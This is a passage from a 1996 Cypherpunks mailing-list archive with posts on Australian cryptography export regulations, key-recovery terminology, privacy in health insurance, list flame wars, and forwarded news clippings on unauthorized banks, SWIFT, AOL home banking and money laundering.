are established, the likelihood of privacy-invading > use is near unity. It certainly is. And cryptography can not do that much about it since it's primarily a problem of user integrity. Asgaard From scmayo at rschp2.anu.edu.au Thu Sep 19 01:17:03 1996 From: scmayo at rschp2.anu.edu.au (Sherry Mayo) Date: Thu, 19 Sep 1996 16:17:03 +0800 Subject: Australian "ITAR" regulations Message-ID: <199609190543.WAA01040@toad.com> Hi all Some time ago I had various email exchanges regarding Australian crypto export regulations. More recently I've been put in the picture by David Cox and others that there are in fact ITAR-like laws in force in Australia. The last time I looked into this, Matt Crean(?) had very little luck finding any info from the various relevant departments, have of whom didn't seem to have a clue. In short, Crypto export from Australia is illegal without a licence - this is making it difficult for David's software firm to compete with their unhampered German competition. Using the following search URL you can find the relevant text (shortened version appended)) http://www.austlii.edu.au/cgi-bin/sinodisp.pl/au/legis/cth/consol_reg/cer439/sch13.html?query=cryptographic However, if anything is done about ITAR in the US, I wouldn't be at all surprised if Australia follows suit. Sherry ps There is an awful lot of crap on c'punks these days - reading it is a bit of a needle in a haystack exercise ;-( ========================= CUSTOMS (PROHIBITED EXPORTS) REGULATIONS - SCHEDULE 13 MILITARY AND NON-MILITARY GOODS (EXPORTATION PROHIBITED EXCEPT ON PRODUCTION OF A LICENCE OR PERMISSION UNDER REGULATION 13B) >>>[snip]<<< 43. Other goods as follows: (a) complete or partially complete cryptographic equipment designed to ensure the secrecy of communications (including data communications and communications through the medium of telegraphy, video, telephony and facsimile) or stored information; (b) software controlling, or computers performing the function of, cryptographic equipment referred to in paragraph (a); (c) parts designed for goods referred to in paragraphs (a) or (b); (d) applications software for cryptographic or cryptanalytic purposes including software used for the design and analysis of cryptologics; (e) radio transmitters and receivers for spread spectrum or frequency agile communications systems having a total transmitted bandwidth that is: (i) 100 or more times greater than the bandwidth of any one information channel in the system; (ii) in excess of 50 kilohertz; or (iii) designed or modified to use cryptographic techniques to generate the spreading code for spread spectrum or the hopping code for frequency agile systems; (f) parts designed or adapted for goods referred to in paragraph (e); (g) software and equipment designed or adapted for controlling the functions of goods referred to in paragraph (e) ; (h) information security systems, equipment, software, application specific assemblies, modules or integrated circuits, designed or modified to provide certified or certifiable multi-level security of user-isolation at a level exceeding Class E4 of the Information Technology Security Evaluation Criteria (ITSEC) or equivalent in force at the commencement of these Regulations; (i) software designed or adapted for the purpose of demonstrating that the information security features referred to in paragraph (h) provide a multi-level security or user-isolation function. From dthorn at gte.net Thu Sep 19 01:22:38 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 19 Sep 1996 16:22:38 +0800 Subject: A daily warning regarding Timothy C. May In-Reply-To: Message-ID: <3240C486.15E0@gte.net> Daniel Christopher Miskell wrote: > Timothy C. May is a lying sack of shit. > Right. And you had to insult him through use of anonymous mail. Boy, > you're real brave, shedding the light to the rest of the cypherworld > in such a manner. > Apologies for the spam, but there was no address, obviously. > If in fact we are the only intelligent life on this planet, why the > fuck are we in this goddamn mess? A. There's probably no intelligent life in the (this) universe, and the Uncertainty Principle is probably wrong, too (i.e., there is really no Free Will, so there are no valid answers either), -and- B. If you were truly intelligent, would you want to come here? From attila at primenet.com Thu Sep 19 01:45:13 1996 From: attila at primenet.com (attila) Date: Thu, 19 Sep 1996 16:45:13 +0800 Subject: No Subject Message-ID: <199609190615.AAA11252@InfoWest.COM> Dimitri; your taste is limitless, your tongue in every sewer. must we suffer the depths of your insane depravity? should we drop a dime on you? you're a disgace to humanity. must we scan even body text to get rid of you? I doubt Tim cares about the lunatic ravings of someone as mad as the mad N's "ice weasals," but your childish profaning of humanity seems to have no bounds. I am flat against censorship, but I think this warrants excluding Dimitri from the list. block his posts and block his subscription. these personal attacks have nothing to do with your general rights; collectively, we are permitted to screen against a banal display of ignorance. On Wed, 18 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > Shamster: SHA-enabled biocomputing hamster. > > I'm sure Timmy would like to wrap one up in duct tape and shove it > up his ass... > From westo at bssc.edu.au Thu Sep 19 16:51:41 1996 From: westo at bssc.edu.au (barina man) Date: Thu, 19 Sep 1996 16:51:41 -0700 (PDT) Subject: No Subject Message-ID: <1.5.4.32.19960920135153.006855d0@172.24.10.10> unscribe From perng at cs.ucla.edu Thu Sep 19 16:53:55 1996 From: perng at cs.ucla.edu (Chang-Shing Perng) Date: Thu, 19 Sep 1996 16:53:55 -0700 (PDT) Subject: Unsubscribe In-Reply-To: <199609192042.NAA16104@sirius.infonex.com> Message-ID: <3241DBC5.4A86@cs.ucla.edu> UNSUBSCRIBE From asgaard at Cor.sos.sll.se Thu Sep 19 02:02:49 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Thu, 19 Sep 1996 17:02:49 +0800 Subject: GAK, GAP, GAY In-Reply-To: <199609190117.SAA04924@netcom21.netcom.com> Message-ID: On Wed, 18 Sep 1996, Vladimir Z. Nuri wrote: > of blinding and zero-knowledge protocols applied to health databases. > it seems reasonable that this can be worked out. De-identified records are common in medical research, where applicable. The problem is that for effective epidemiological research the self-generated ID you propose must be applied in a lot of databases outside of health care. The epidemiologist wants to know when you were born, when you give birth or die or buy liquor, your income, standard of living, grade of radon contamination in your house, what Web-pages you access etc etc. (The Swedish Post is currently spending a lot of money advertising their new Web services. For full access to such sensitive data as detailed wheather maps you have to enter your name, address and Person Number - for credit information, they say - and they will send you, by snail mail, a username and password; http://www.torget.se) So in the end you haven't really gained much by creating your own ID - it will be just as useful to the State as if they had given it to you. Asgaard From dthorn at gte.net Thu Sep 19 02:17:44 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 19 Sep 1996 17:17:44 +0800 Subject: A Bizarre Increase in the Ad Hominems Here In-Reply-To: Message-ID: <3240C258.3464@gte.net> Dr.Dimitri Vulis KOTM wrote: > tcmay at got.net (Timmy May) (fart) writes: > * Detweiler (vznuri at netcom.com) writes: > Detweiler is much smarter than VZNuri (or Timmy). I don't think Timmy > believes his own lies. > .....random slurs deleted..... > Recently, 3 people in the computer security field have independently > told me that Timmy May approached them "off-list" to complain about > things I supposedly say on the Internet - most of which I never said. > When I asked about it on this mailing list, Timmy posted what was > shown to be a lie (about his complaint to Kelly Goen.) Timmy is known > as a nutcase and a liar - if he keeps up his "character assassination" > attacks, the only reputation he hurts is his own. Pardon me for butting in, but "nutcase and liar" are some pretty significant slurs, moreso than "putz" or "bozo" or whatever. I'd say there's gotta be a helluva story here. Background, anyone? From rp at rpini.com Thu Sep 19 02:18:44 1996 From: rp at rpini.com (Remo Pini) Date: Thu, 19 Sep 1996 17:18:44 +0800 Subject: WinSock Remailer Version ALPHA 1.3 Now Available Message-ID: <9609190709.AA20094@srzts100.alcatel.ch> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Thu Sep 19 09:07:16 1996 Has it already been exported by some sinister anonymous? If so, where? - ------< fate favors the prepared mind >------ Remo Pini rp at rpini.com PGP: http://www.rpini.com/crypto/crypto.html - ----< words are what reality is made of >---- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQEVAwUBMkDxJRFhy5sz+bTpAQGnGAf9GgDkjFpjbHewBBAQlGBiZvVeRM+Co8zx sP8eQN3FJbvwVQdIblxy3Tc4k0/q4+8KA/GCYpEsN4h9+71CgPWHeMGla0egKf4L eGcYGlBKNPA+EmJnX7YETqMAFOblejgxgxWwnPOZLMiOqiBhTGpqIq1xEJugXm6v m85qDTSomlhygKnexWVv9jVM6ntyx2x0WBCwR/L+B9NrFcoBv5GTCpiXOoEzOXq2 PhPmxxdD1Q2NF9/FSLGTOJPy9BgIyO7L3MzmKeC5ps3jlmN2Q4U+Icdchd4nnB/a IAzyBWqNCnxmglbdhhq2JoU1HLi+6DsuhaOoE3T5VDar+gPcVD/Apg== =0Iof -----END PGP SIGNATURE----- From dthorn at gte.net Thu Sep 19 02:25:13 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 19 Sep 1996 17:25:13 +0800 Subject: cypherpunk listserve usefulness In-Reply-To: Message-ID: <3240C832.E1E@gte.net> Chip Mefford wrote: > As much as it shames me, I have recently discovered that by filtering > messages from only 2 participants and setting body filters on 3 > keywords have remarkably improved the usefulness of this listserve. > As much as I do enjoy some of the filtered subject matter, I really > feel it is very off subject and makes this listserver useless for the > intended task. > I guess that makes me a censor and it has me reexamining some things. Why not have the filter be more like a sieve, and dump the low-priority stuff into separate containers, then sort them by personal criteria such as message size, frequency of key words, etc.? If you maintain multiple sorts, you can look over the stuff when you have a chance, and mass-dump a series of messages that don't make a cutoff you specify at read-time. Since I write my own utilities, I can mix and match keyword parsers, multiple-indexed text browsing, and so on. Of course, the commercially- available software totally sucks... From tcmay at got.net Thu Sep 19 02:25:58 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 19 Sep 1996 17:25:58 +0800 Subject: The Beauty of "A la Carte" Insurance Plans Message-ID: At 8:44 PM 9/18/96, jbugden at smtplink.alis.ca wrote: >I don't speak for the left, nor for the right. I don't think that there is a >unified voice on either side of the political spectrum. However I do find it >ironic that market driven health insurance has the potential to be more >intrusive into personal life than many government systems (cf. genetic >screening). > >If all you do is replace Big Brother with Big Business, then all that has >changed is the name. To paraphrase the character in "The Graduate": "One phrase, Benjamin...a la carte insurance." I delight in explaining this point to people, and watching the glimmer of understanding take hold, then watching them realize the implications. I recall explaining this view a couple of years ago here on this list, but probably not since then. So, time has come for me to give it another shot. Is there an alternative to a Giant Corporation (tm) essentially performing the role of Big Brother? I submit that there is. Here's what one does. I'll use a concrete example. Suppose that one is not a homosexual, is not engaging in anal intercourse with partners, is not an IV drug user, and is not a hemophiliac. Further, suppose that one is reasonably monogamous (e.g., fewer than several different sex partners a year, and such partners are themselves not in high-risk groups, as defined in the first part of this paragraph). Such a person is in a very low risk group for AIDS. What one does is to *opt out* of any coverage for AIDS-related coverage. One opts out completely, signs a waiver to this effect, and absolves the insurer of any responsibility for AIDS- or ARC-related illnesses. (This is not perfect, is not "fine-grained" enough, compared to an insurer doing exhaustive tests and lifestyle interrogations and then offering some precise rate to be paid. But it has the advantage that the insurer does not get the exhaustive and intrusive lifestyle information, and the rough cut of "opting out" is almost certainly OK for most low-risk persons. Your mileage may vary, in which case you may submit to a detailed lifestyle analysis. Sadly, many laws exist which don't allow insurance companies to ask the questions and do the tests needed to establish the risk of getting AIDS--sort of like not allowing an insurance company to ask if a person is a low-risk philosopher or a high-risk aircraft test pilot!) Ditto for any other disease which one can either make a reasonable estimate of, or can be _tested for_ (tested privately, independently of any insurance company!). Thus, for the various _genetic_-related diseases, one can check independently to see if one is a reasonably likely carrier of such genes, and, if not, can *opt out* of any coverage for those diseases. This process of *opting out* has the beautiful advantage of taking one's self out of the "subsidizers" pool while not materially affecting one's actual risk of being uncovered for some disease or condition. And all without an intrusive physical exam (though an exam may still be asked for, etc.). The parallel is quite close to people opting out of coverage for things they know they are not at risk for, such as hang-gliding accidents, horseback-riding accidents, aircraft test piloting, etc. (Such exemptions are not "enforced" by the insurance company following one around, or mounting a "position escrow" device on one's body, but by the eminently reasonable approach of simply not paying off if the accident was due to a hang-gliding accident, a horseback riding accident, etc. This is how the "non-smoker" discounts in auto insurance work...finding strong evidence that one is actually a smoker (crud in the lungs, cigarette butts all around the house when living alone, etc.) is positive evidence that one lied about being a non-smoker, and the policy is cancelled without payout.) I wish I could say I thought of this strategem of "opting out," but I believe I read about it some years ago in "Reason" or "Liberty." It understandably outrages liberals, who realize that people will arrange private tests for themselves, and will then opt out of a la carte coverage of diseases they reasonably believe are unlikely to affect them. (Nothing is certain, of course, and there is some chance that if one opts of coverage for Lou Gehrig Disease, or MS, or AIDS, that one may still end up with one of these diseases. TANSTAAFL, and most people will jump at the chance to remove themselves from a pool for something they feel they are very unlikely to get.) To relate this to the other examples, if one opts out of SCUBA-diving coverage, because one is not a SCUBA diver, this does not require the insurance company to intrusively investigate one's life. Diving accidents just don't get covered, period. Some have argued that a la carte insurance should be banned, for precisely this reason, that people will always be able to "game against" the rules. (To make this clear, the flip side of someone opting out of coverage for Disease A is that someone else may already know they are very likely to have Disease A or be at strong risk for Disease A. Forcing an insurance company to accept all applicants means this second category can game against the system, getting more out of the system than they expect to put in.) Supporting the "opting out" or "a la carte" approach to insurance allows personal privacy to be maximally preserved. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dthorn at gte.net Thu Sep 19 02:36:09 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 19 Sep 1996 17:36:09 +0800 Subject: The GAK Momentum is Building... In-Reply-To: Message-ID: <3240DD33.28B6@gte.net> Lucky Green wrote: > On Wed, 18 Sep 1996, Jim Ray wrote: > I agree, and hope so. "Key Recovery," while not as Orwellian-sounding > as "GAK," is a step on the path to honesty WRT the English language, > though it's important to continually point out, as Tim did in his > post, that *access* -- rather than just recovery -- is obviously what > Mr. Freeh wants. > I'd count this likely change in terminology as a "cypherpunk victory," > albeit a very small and certainly a very hard-fought one. > Nope. It is a Cypherpunk loss. The use of the term "key recovery" for > GAK now fully obfuscates the distinction between accessing a > backup copy by the legitimate owner (or his estate, employer, etc.) > and GAK. Many PKIs will support the former type of key recovery. And > for good reasons. Thanks to the brainwashers using the same term for > GAK, it will now become impossible to tell from a basic description of > a PKI if it supports GAK or not. Furthermore, those who oppose the > latter type of key recovery (us!), will be pushed further into the > fringe by the media now being able to mix up our arguments against GAK > with arguing against true key recovery. [Do you notice the weird > constructs I have to use to distinguish the two meanings? One of them > being new...] > --Lucky My comment: Once the big Corp.'s get used to the new game, they'll put the non-critical stuff out there for Mr. Freeh, and for the really secret data, if the cops confiscate anything they can't read, the Corp. security will put it off on a fall-guy, even as high as the CEO if necessary. I just wanna see one case where a federal judge will try to bleed a big company for contempt for "refusing" to decode and hand over some ostensibly encrypted data. Matter of fact, there are probably cases similar to this that have already been through the appeals courts. From wombat at mcfeely.bsfs.org Thu Sep 19 02:40:51 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Thu, 19 Sep 1996 17:40:51 +0800 Subject: [joke, non-code] Re: Get this for a snake-oil example :) In-Reply-To: Message-ID: ack barf snort, forgot my lithium, bad 'net night? -r.w. On Wed, 18 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > f_estema at alcor.concordia.ca writes: > > Shamster: SHA-enabled biocomputing hamster. > > I'm sure Timmy would like to wrap one up in duct tape and shove it > up his ass... > > --- > > Dr.Dimitri Vulis KOTM > Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps > From dlv at bwalk.dm.com Thu Sep 19 02:45:23 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 17:45:23 +0800 Subject: [NEWS] Crypto-relevant wire clippings In-Reply-To: <5gLguD3w165w@bwalk.dm.com> Message-ID: >From adamsc at io-online.com Thu Sep 19 00:00:57 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Thu, 19 Sep 96 00:49:21 EDT for dlv Received: from [206.245.244.5] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA10508 for dlv at bwalk.dm.com; Thu, 19 Sep 96 00:00:57 -0400 Received: from GIGANTE ([206.245.244.168]) by irc.io-online.com (post.office MTA v2.0 0813 ID# 285-17715) with SMTP id AAA215 for ; Wed, 18 Sep 1996 21:00:07 -0700 Return-Path: Received: from toad.com ([140.174.2.1]) by irc.io-online.com (post.office MTA v2.0 0813 ID# 285-17715) with ESMTP id AAA186 for ; Wed, 18 Sep 1996 20:56:47 -0700 Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id RAA26101 for cypherpunks-outgoing; Wed, 18 Sep 1996 17:31:02 -0700 (PDT) Received: from uu.psi.com (uu.psi.com [136.161.128.3]) by toad.com (8.7.5/8.7.3) with SMTP id RAA26096 for ; Wed, 18 Sep 1996 17:30:29 -0700 (PDT) Received: by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via UUCP; id AA21433 for ; Wed, 18 Sep 96 20:18:46 -0400 Received: by bwalk.dm.com (1.65/waf) via UUCP; Wed, 18 Sep 96 12:11:04 EDT for cypherpunks at toad.com To: "dlv at bwalk.dm.com" Subject: Re: [NEWS] Crypto-relevant wire clippings From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Message-Id: <5gLguD3w165w at bwalk.dm.com> Date: Wed, 18 Sep 96 12:11:03 EDT In-Reply-To: <199609181401.AA21244 at crl11.crl.com> Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. Sender: owner-cypherpunks at toad.com Precedence: bulk >From varange at crl.com Wed Sep 18 10:09:46 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Wed, 18 Sep 96 11:07:02 EDT for dlv Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA17510 for dlv at bwalk.dm.com; Wed, 18 Sep 96 10:09:46 -0400 Received: from crl11.crl.com by mail.crl.com with SMTP id AA03347 (5.65c/IDA-1.5 for ); Wed, 18 Sep 1996 07:10:14 -0700 Received: by crl11.crl.com id AA21244 (5.65c/IDA-1.5 for dlv at bwalk.dm.com); Wed, 18 Sep 1996 07:01:51 -0700 From: Troy Varange Message-Id: <199609181401.AA21244 at crl11.crl.com> Subject: Re: [NEWS] Crypto-relevant wire clippings Date: Wed, 18 Sep 1996 07:01:50 -0700 (PDT) In-Reply-To: <3kJFuD96w165w at bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 17, 96 10:32:37 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 19290 > > Money Laundering Alert: August 1996 > > 'Unauthorized' Banks Pose Laundering Threat > > They are subject to none of the recordkeeping or reporting requirements > of the Bank Secrecy Act, receive no examinations from any banking > regulator, and may be on your bank's currency transaction reporting > exemption list. > > The Office of the Comptroller of the Currency refers to them as > "entities that may be conducting banking operations in the U.S. without > a license." Money launderers probably refer to them as dreams come true > and, unless legitimate financial institutions are alert, can use them to > place illicit proceeds into the financial system. > > They are "unauthorized" banks, and for the past five years the OCC has > been disseminating advisories to legitimate U.S. banks - but not to > consumers - in an effort to expose their existence and halt their > illegal operations. > > These so-called "banks" offer a variety of banking services, often at > lower fees and better interest rates than legitimate banks offer. What > makes them different from a legitimate bank - and attractive to money > launderers -- is that they are not licensed by any U.S. banking agency > and thus do not have to meet regulatory standards. > > Because the OCC and other federal bank regulators are not investigative > agencies, they can do little more than report these institutions to > those who are. If the entities are found to be operating a bank without > a license they can be prosecuted under the Glass-Steagell Act (Title 12, > USC Sec. 378(a)(2)). > > Such prosecutions are rare. In one case in 1994, initiated by Federal > Reserve Board examiners, the principals of Lombard Bank, Ltd., were > charged with operating an unauthorized bank through a payable-through > account at American Express Bank International in Miami. Lombard, which > had been "licensed" in the South Pacific money laundering haven of > Vanuatu, offered its Central American customers virtually full banking > services in the U.S. through its PTA (MLA, Sep. 1994). > > Earlier this year, the OCC released a list of more than 50 "banks" known > to be operating without authorization. OCC officials say the number > grows steadily. Some of the "banks" say they are licensed by foreign > countries or U.S. states to conduct banking business. Others, such as > the Swiss Trade & Commerce Trust, Ltd., of Belize, continue to offer > services in the U.S. despite edicts from foreign banking authorities to > cease doing business. > > The unauthorized entities have a common trait. They usually have names > that are similar to those of well-known legitimate institutions. The OCC > list includes the Bank of England, a Washington, D.C., entity not > associated with London's famous "old lady on Threadneedle Street" and > Citicorp Financial Services, a Beverly Hills firm not associated with > the better-known institution of that name. It also includes the First > Bank of Internet, which heralds itself as the first bank in cyberspace. > > Through its periodic "special alerts," the OCC warns banks to "view with > extreme caution any proposed transaction involving any of the listed > entities." It makes no effort to educate members of the general public > who unknowingly place their money and trust in those uninsured > institutions. > > > > > American Banker: Friday, August 30, 1996 > > Swift Near Alliance in Trade Document Automation > > By STEVEN MARJANOVIC > > Swift, the international banking telecommunications network, wants to > play a bigger role in trade finance and the exchange of related > documentation. > > Sources said the Brussels-based organization will soon take a position-- > perhaps as early as its September board meeting-- on whether to work on > trade automation in cooperation with another consortium, called Bolero. > > Such a move would involve an increase in nonbank participants on a > bank-owned network that has approached such liberalization cautiously. > > Swift, formally the Society for Worldwide Interbank Financial > Telecommunication, is used by 5,300 banks for exchanging messages in > such areas as funds transfer, foreign exchange, and securities. > > The network averaged about 2.7 million messages a day in July, > representing daily dollar volumes exceeding $2 trillion. > > Officials said Swift is nearing a decision to work with the Bolero > Association, which is forming an electronic registry for the so-called > "dematerializing" of trade documents. Swift could provide the "platform" > for allowing banks and corporations to exchange such documentation as > letters of credit and bills of lading. > > Bolero was formed in 1994 with funding from the European Commission, but > has not formulated concrete operating plans. Its members include > Citicorp, Barclays Bank PLC, and other multinational banks and > corporations. > > Peter Scott, trade services market director at Swift, said it has been > in discussions with London-based Bolero since December 1995 about > joining forces to automate the exchange of trade documents. > > "Bankers are beginning to sense both the opportunities in those areas > and the threats to them from an intermediary stepping in and potentially > taking away the business," Mr. Scott said. > > Trade-document capability "is not a heavily utilized area within Swift > at the present time," he said. > > The potential in automation is obvious to Bolero officials. At the New > York Banktrade Conference recently, John McKessy, the association's > North American representative, said the annual value of goods moved > internationally approaches $4 trillion. > > He estimated current international trade requires some three billion > documents to be issued and managed. > > The cost of dealing with paper alone eats up about 7% of the total value > of those goods, as much as $280 billion, Mr. McKessy said. > > Bank revenues from issuing letters of credit last year were just over $1 > billion, according to a soon-to-be-released survey by the U.S. Council > on International Banking. > > Anthony K. Brown, senior vice president of trade services at MTB Bank, > described trade transaction processing as "extremely cumbersome and > tedious, prone to mistakes and delays (that) can be a hindrance to the > completion of a transaction." > > MTB is a $400 million-asset merchant bank based in New York. About 80% > of its $100 million in loans are trade-related. > > The paper-shuffling costs are not borne entirely by banks. Import/export > companies, insurers, freight forwarders, and various government > inspection agencies are also involved. > > "The question is whether Swift wants to do it," said Dan Taylor, > president of the New York-based U.S. Council. > > "Swift is going to act fairly quickly on this," he added. > > Mr. Taylor said Swift officials will likely grapple once again with the > political and philosophical issues of giving nonbanks more access to > Swift, and to payment systems generally. > > In 1995, the network granted partial access to nonbanks after years of > heated debate. > > "You always have this push and pull, where some banks would like Swift > to do certain things" while others want the network to focus on the > money transfer business, Mr. Taylor said. > > "If Bolero succeeds and Swift joins, I think it will move fairly > rapidly, but I'm not sure that Bolero is going to be the only thing out > there." > > He said Bolero might evolve using value-added networks - or intranets - > like the IBM Global Network and General Electric Information Services > Co., or perhaps even the Internet. > > Indeed, another member of Bolero, CSI Complex Systems Inc., New York, is > apparently talking to several providers of private, value-added networks > and may soon enter a contract with one. > > CSI letter-of-credit software leads the pack in banking, with about a > 16% market share, Mr. Taylor said. > > The company recently formed a business unit called Electronic Documents > International, which has developed an Internet-based system for > initiating letters of credit. CSI spokesman George Capsis said the > software, Import.com, creates "about 30 key documents involved in > international trade." > > The Internet, enhanced with security features, may help the trade > industry reduce paper-related costs, especially at smaller companies > overseas. > > CSI managing director Andre Cardinale said customers need only to "dial > into a bank's Internet server, pull up the Import.com application, and > actually fill in the details to create a new letter of credit or an > amendment to an existing one." > > While Bolero may find a place on the Internet or a GE-type network, Mr. > Cardinale said the ultimate push may yet come from the banking industry > working collectively through Swift. > > He said Swift opposition from nonbank constituencies that are concerned > the telecommunications cooperative will be more sympathetic to banks > when disputes arise. > > But "if Swift does it," he added, "it will bring banks into the universe > far more - pardon the pun - swiftly." > > > Crain's New York Business: August 26, 1996 > > Bloomberg to Detail Growth of Information Empire > > Michael Bloomberg made a name for himself on Wall Street with his > trading acumen and mastery of the computer systems that were becoming > crucial to success in the securities business. > > But no one suspected when he left Salomon Brothers in 1981 that in the > next decade he would build the fastest-growing provider of financial > information in the world. > > Mr. Bloomberg, whose company Bloomberg Financial Markets has estimated > sales of $600 million, will be the keynote speaker at the fifth annual > Crain's ''Growing a Business Expo,'' to be held this year on Thursday, > Oct. 24. > > The event will take place at the New York Hilton & Towers from 8 a.m. to > 1 p.m. It is presented by Citibank and co-sponsored by Con Edison and > Empire Blue Cross and Blue Shield. > > Last year, more than 1,000 growing business owners and managers attended > the expo, which provides information for companies operating in the city > regarding potential suppliers, financial resources and government > programs. > > The cost to attend the event is $45 and includes a continental > breakfast. Individuals registering before Sept. 6 can bring a colleague > for free. To register, call Flagg Management at (212) 286-0333. > > In addition to Mr. Bloomberg's speech, attendees will be able to attend > seminars on financing and other help available from the city, financing > techniques, energy cost savings programs and how to reduce health > insurance costs. An expected 135 exhibitors will be offering products > and services of use to growing companies. > > Crain's New York Business editors will discuss how a growing business > can get coverage in Crain's and in other publications. > > The heart of Mr. Bloomberg's empire is a news gathering operation that > sends information through 62,000 computer terminals installed on the > desks of investment professionals around the nation. His company > provides the latest financial news and sophisticated tools to analyze > information. > > The company he has built is noted for its lack of bureaucracy despite > its growth to 2,000 employees. Its hallmarks are hands-on leadership and > an entrepreneurial atmosphere where employees receive perks such as free > food. > > Mr. Bloomberg has extended his reach to include an all-news radio > station in New York, WBBR; Bloomberg Personal TV; syndicated television > shows; a monthly personal finance magazine; and a similar magazine for > institutional investors. > > > American Banker: Friday, September 6, 1996 > > America Online Opens a New Banking Channel > > By DREW CLARK > > Nineteen banks - national home banking stalwarts such as Citicorp and > BankAmerica, plus a complement of less prominent regionals - have > climbed onto the America Online bandwagon. > > Most already offer their customers several options for banking via > personal computer and view America Online, with its six million > subscribers, as a way to appeal to a broad cross-section of computer- > literate consumers. > > Fourteen of the AOL banking partners will be delivering services through > BankNow, a software package developed for the interactive network by > Intuit Inc. > > The other five banks have opted to use their own software. One of them - > Security First Network Bank, which operates entirely on the Internet - > will invite AOL users in through their Web browsers. > > With its announcement this week, America Online Inc. takes its place > among the many alternative "channels" for on-line banking. > > Many of the banks on AOL's list are simultaneously cooperating with > other companies that are themselves competitors, such as Intuit and > Microsoft Corp., suppliers of the Quicken and Money financial management > software, respectively. > > Also crossing competitive lines, America Online said its subscribers > will be able to bank from home with PC software from three suppliers > other than Intuit: Checkfree Corp., Online Resources and Communications > Corp., and Visa Interactive. > > "Everyone understands that there is competition in the home banking > arena," said David Baird, general manager of the personal finance > division at America Online, based in Dulles, Va. "To align ourselves > with exclusively one company would be a mistake." > > Intuit can count on 14 initial bank users of BankNow. Spokesmen for the > other three system vendors declined to say when they expect to have home > banking products available for the AOL channel. > > Experts noted that AOL and Intuit could be a strong tandem, in that they > dominate their respective businesses. > > Intuit's Quicken is the leading brand in personal finance software. The > company claims more than 9 million active users and a market share of > about 80%. > > America Online's subscriber base of six million is as big as those of > its next two competitors, Compuserve and Prodigy, combined. > > The financial institutions currently offering BankNow are: American > Express, Bank of Stockton (Calif.), Centura Banks Inc., Commerce Bank of > Kansas City, Mo., Commercial Federal of Omaha, Compass Bank of Alabama, > CoreStates Financial Corp., Crestar Financial Corp., First Chicago NBD > Corp., Laredo (Tex.) National Bank, M&T Bank of Western New York, > Marquette Bank of Minneapolis, Sanwa Bank California, and Union Bank of > California. > > More plan to offer BankNow-based services through AOL later this year: > BankAtlantic of Florida, Bank of Boston, First Hawaiian Bank, First > Michigan Bank, Mellon Bank, Signet Bank, and U.S. Bank of Oregon. > > Unlike Quicken, BankNow software is available free to America Online > subscribers. > > Banks' fees will vary. First National Bank of Chicago said it will > charge $3.95 a month for on-line banking and $9.95 a month for other > services that include bill payment. > > Centura Banks Inc. said it will offer on-line banking free, and charge > $5.95 a month for bill payment. > > Intuit officials declined to disclose what its Intuit Services Corp. > processing unit will charge to handle these transactions for banks. > > Some of Intuit's larger bank partners chose not to offer BankNow because > they already promote their own PC banking programs. > > For example, Citicorp, First Union, and Wells Fargo each support > Quicken, but passed on BankNow. Instead, they are paying a premium for a > "button" on America Online's banking screen that will eventually link > users to a proprietary home banking program. > > > > AP Online: Thursday, September 5, 1996 > > House Probes Money Laundering > > By ROB WELLS > > House Banking Committee members on Thursday urged a Treasury Department > agency to step up its efforts to halt money laundering by Mexican drug > lords. > > Rep. Spencer Bachus, R-Ala., urged the Financial Crimes Enforcement > Network to put in place new regulations to plug a significant loophole > that allows Mexico's drug dealers to place their ill-gotten profits back > into the U.S. > > Bachus, chairman of the House Banking oversight subcommittee, said > Congress gave authority to FinCen in 1994 to put in place new rules that > would prevent drug dealers from using foreign bank drafts, a type of > check, to evade currency reporting restrictions. > > ''That effort is long, long overdue,'' Bachus said. > > Rep. Henry Gonzalez, D-Texas, asked the agency to provide further > details about suspected money laundering in his home town of San > Antonio, particularly the source of a $3 billion cash surplus in the San > Antonio Federal Reserve Bank. > > The issue arose as Bachus' panel began exploring the dramatic rise of > narcotics traffic along the 2,000 mile long U.S.-Mexico border, and the > ease with which drug dealers can ship their profits to the south. Money > laundering refers to the practice by which drug dealers, mobsters and > others funnel their illegal profits into the banking system through > businesses or other means. > > Bachus said estimates of drug profits laundered through Mexico range > from $6 billion to $30 billion per year. Stanely E. Morris, FinCen's > director, defended his agency's record, saying a combination of new > rules and tougher enforcement in the past decade has ''made it more > difficult to launder money in the U.S.'' and increased the costs of > money laundering. Morris' agency enforces the Bank Secrecy Act, a key > weapon against money laundering. > > As for the new rules aimed at foreign bank drafts, Morris said the > regulations are more difficult than first expected because such > restrictions also could hinder legitimate commerce. He said the proposal > would be released soon. > > FinCen is working on other fronts to combat money laundering, which > includes a new computer system that tallies bank fraud to help > regulators gain an early warning of money laundering. > > In addition, the Clinton Administration assisted Mexico in 